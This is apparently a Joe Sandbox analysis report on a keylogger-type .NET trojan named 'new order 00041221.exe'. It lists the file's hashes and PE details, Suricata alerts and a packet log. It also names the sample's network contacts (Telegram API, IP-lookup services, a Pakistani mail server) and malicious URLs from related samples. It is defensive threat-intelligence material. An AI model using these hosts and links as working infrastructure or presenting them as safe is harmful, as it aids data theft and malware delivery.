                    		api.telegram.orgUnited Kingdom
                    		62041TELEGRAMRUtrue
                    188.114.97.3
                    		reallyfreegeoip.orgEuropean Union
                    		13335CLOUDFLARENETUStrue
                    203.124.44.4
                    		mail.moonbrosurgical.comPakistan
                    		7590COMSATSCommissiononScienceandTechnologyforPKfalse
                    193.122.6.168
                    		checkip.dyndns.comUnited States
                    		31898ORACLE-BMC-31898USfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1482843
                    Start date and time:2024-07-26 09:02:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:19
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:new order 00041221.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@6/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 101
                    • Number of non-executed functions: 40
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    03:03:04API Interceptor10453392x Sleep call for process: new order 00041221.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    149.154.167.2207NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                      7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                        file.exeGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousUnknownBrowse
                            file.exeGet hashmaliciousUnknownBrowse
                              LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                  New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                      Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        188.114.97.3#U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                                        • tny.wtf/4Gs
                                        Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                                        • downloaddining2.com/h9fmdW6/index.php
                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                        • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                                        LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                                        • www.whatareyoucraving.com/drbb/
                                        AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                                        • tny.wtf/pqv2p
                                        AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                                        • tny.wtf/pqv2p
                                        AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                                        • tny.wtf/pqv2p
                                        PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                                        • tny.wtf/vMCQY
                                        LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                                        • cccc.yiuyiu.xyz/config.ini
                                        irlsever.docGet hashmaliciousFormBookBrowse
                                        • www.ninunveiled.shop/y2xs/
                                        203.124.44.4WT01151024637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          193.122.6.168New order.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Orden de Compra..exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Fekdjuvq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          neworder.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          reallyfreegeoip.orgNew order.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.96.3
                                          Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.96.3
                                          Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          checkip.dyndns.comNew order.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 193.122.6.168
                                          New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.130.0
                                          Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 193.122.6.168
                                          LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 132.226.247.73
                                          Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 193.122.6.168
                                          Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 193.122.6.168
                                          Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                          • 132.226.247.73
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          api.telegram.org7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                          • 149.154.167.220
                                          Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 149.154.167.220
                                          mail.moonbrosurgical.comWT01151024637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 203.124.44.4

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ORACLE-BMC-31898USNew order.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          http://docusign.netGet hashmaliciousUnknownBrowse
                                          • 192.29.14.118
                                          New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.130.0
                                          Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 193.122.6.168
                                          Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 193.122.6.168
                                          Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 193.122.6.168
                                          Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          Lisect_AVT_24003_G1B_67.exeGet hashmaliciousUnknownBrowse
                                          • 158.101.28.51
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          TELEGRAMRU7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          fps-booster.exeGet hashmaliciousStormKittyBrowse
                                          • 149.154.167.99
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          http://jolly-figolla-4c9551.netlify.app/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.99
                                          LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          LisectAVT_2403002A_138.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
                                          • 149.154.167.99
                                          CLOUDFLARENETUSJGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                          • 172.64.41.3
                                          zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                                          • 162.159.61.3
                                          N#U00b0025498563-.pdfGet hashmaliciousUnknownBrowse
                                          • 172.64.41.3
                                          #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                                          • 188.114.97.3
                                          6Vm1Ii4ASz.exeGet hashmaliciousBabadedaBrowse
                                          • 172.64.41.3
                                          ynhHNexysa.exeGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.74.152
                                          http://lotsa.pplanr.comGet hashmaliciousUnknownBrowse
                                          • 104.21.44.162
                                          2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.74.152
                                          QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.2.16
                                          http://leostop.comGet hashmaliciousUnknownBrowse
                                          • 104.16.141.114
                                          COMSATSCommissiononScienceandTechnologyforPKWT01151024637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 203.124.44.4
                                          PWvekjrPit.elfGet hashmaliciousUnknownBrowse
                                          • 203.124.39.102
                                          SecuriteInfo.com.Win32.TrojanX-gen.29414.12459.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 203.124.44.180
                                          Payment_Advice-BCS_ECS9522024012916420050_38_952.pdf.eml.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 203.124.44.180
                                          SecuriteInfo.com.Win32.TrojanX-gen.29443.22875.exeGet hashmaliciousAgentTeslaBrowse
                                          • 203.124.44.180
                                          SecuriteInfo.com.Win32.PWSX-gen.4826.5402.exeGet hashmaliciousAgentTeslaBrowse
                                          • 203.124.44.180
                                          SecuriteInfo.com.MSIL.GenKryptik.FQQD.tr.9358.12928.exeGet hashmaliciousAgentTeslaBrowse
                                          • 203.124.44.180
                                          SecuriteInfo.com.Win32.PWSX-gen.15477.26079.exeGet hashmaliciousAgentTeslaBrowse
                                          • 203.124.44.180
                                          SecuriteInfo.com.Win32.RATX-gen.26533.9243.exeGet hashmaliciousAgentTeslaBrowse
                                          • 203.124.44.180
                                          SecuriteInfo.com.Win32.PWSX-gen.29302.28377.exeGet hashmaliciousAgentTeslaBrowse
                                          • 203.124.44.180

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          54328bd36c14bd82ddaa0c04b25ed9adNew Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          LisectAVT_2403002B_361.exeGet hashmaliciousQuasarBrowse
                                          • 188.114.97.3
                                          SWIFT.exeGet hashmaliciousLokibotBrowse
                                          • 188.114.97.3
                                          Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          Lisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                                          • 188.114.97.3
                                          3b5074b1b5d032e5620f69f9f700ff0eynhHNexysa.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          7Y18r(191).exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          7Y18r(169).exeGet hashmaliciousCryptOneBrowse
                                          • 149.154.167.220
                                          7Y18r(191).exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          fps-booster.exeGet hashmaliciousStormKittyBrowse
                                          • 149.154.167.220
                                          https://metamaskwalletexetention.webflow.io/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          http://56edthdxfhbx.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                          • 149.154.167.220
                                          https://banco.estado-app.comGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          http://contact-office-kawai9lpoe9srsi9lpoe9srsi.narymar.com/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.220

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new order 00041221.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\new order 00041221.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.862704704273304
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:new order 00041221.exe
                                          File size:740'864 bytes
                                          MD5:f0c82f395d37fa87114ca7ef075695c8
                                          SHA1:06df165721ef1544251108d1af927786ea7de870
                                          SHA256:d954045a10b2292df4e754ad6f1c5350c82ce0a75d2cd9275ada797eca2c413f
                                          SHA512:145f6655175992ee8d5526aea9e8dc281b243183a7c96fb170f63b620bcc39cbca7caa75672f02968deef34a5bc51bba4b82b89755145f0c5446cc63a5581430
                                          SSDEEP:12288:pTNYsbvttIEsckdcJvb0wSeIRT8d8OX4SOE0+N3bve6wJC+WrNnv0Y3S3yo3PeJW:tNYsbvttIRZm4SHHNZrNnvGyo3q
                                          TLSH:6BF4122D56AA9F57CB3D87B9F09220440774E029F283F75E5EC1E4E80E627D4C8976A3
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..f.................D...........c... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00928e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x4b638e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66A3037A [Fri Jul 26 02:01:30 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb63340x57.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x600.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xb43940xb4400f2c21709783cfecf3bab12beb0a753c9False0.9138281791782247data7.869956261157549IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xb80000x6000x6008cc51061b76e2ed9a4b6d2ac40a49596False0.4446614583333333data4.208815747903402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xba0000xc0x2001ec507a80a6c9a0a331e6f4c2391e4c1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xb80900x354data0.4460093896713615
                                          RT_MANIFEST0xb83f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                          2024-07-26T09:03:24.118819+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49720443192.168.2.7188.114.97.3
                                          2024-07-26T09:03:09.919075+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49706443192.168.2.7188.114.97.3
                                          2024-07-26T09:03:45.702091+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435579740.127.169.103192.168.2.7
                                          2024-07-26T09:03:10.643717+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970780192.168.2.7193.122.6.168
                                          2024-07-26T09:03:09.300053+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970280192.168.2.7193.122.6.168
                                          2024-07-26T09:03:24.465395+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971752.165.165.26192.168.2.7
                                          2024-07-26T09:03:06.940575+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970280192.168.2.7193.122.6.168
                                          2024-07-26T09:03:44.316920+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435579640.127.169.103192.168.2.7

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 26, 2024 09:03:05.825613022 CEST4970280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:05.831568956 CEST8049702193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:05.831721067 CEST4970280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:05.832084894 CEST4970280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:05.837492943 CEST8049702193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:06.531081915 CEST8049702193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:06.535823107 CEST4970280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:06.540728092 CEST8049702193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:06.891879082 CEST8049702193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:06.940574884 CEST4970280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:06.955890894 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:06.955939054 CEST44349703188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:06.956557035 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:06.963951111 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:06.963975906 CEST44349703188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:07.438919067 CEST44349703188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:07.439071894 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:07.444463015 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:07.444472075 CEST44349703188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:07.444812059 CEST44349703188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:07.487534046 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:07.505680084 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:07.548540115 CEST44349703188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:07.960217953 CEST44349703188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:07.960319042 CEST44349703188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:07.960413933 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:07.969619036 CEST49703443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:07.992885113 CEST4970280192.168.2.7193.122.6.168
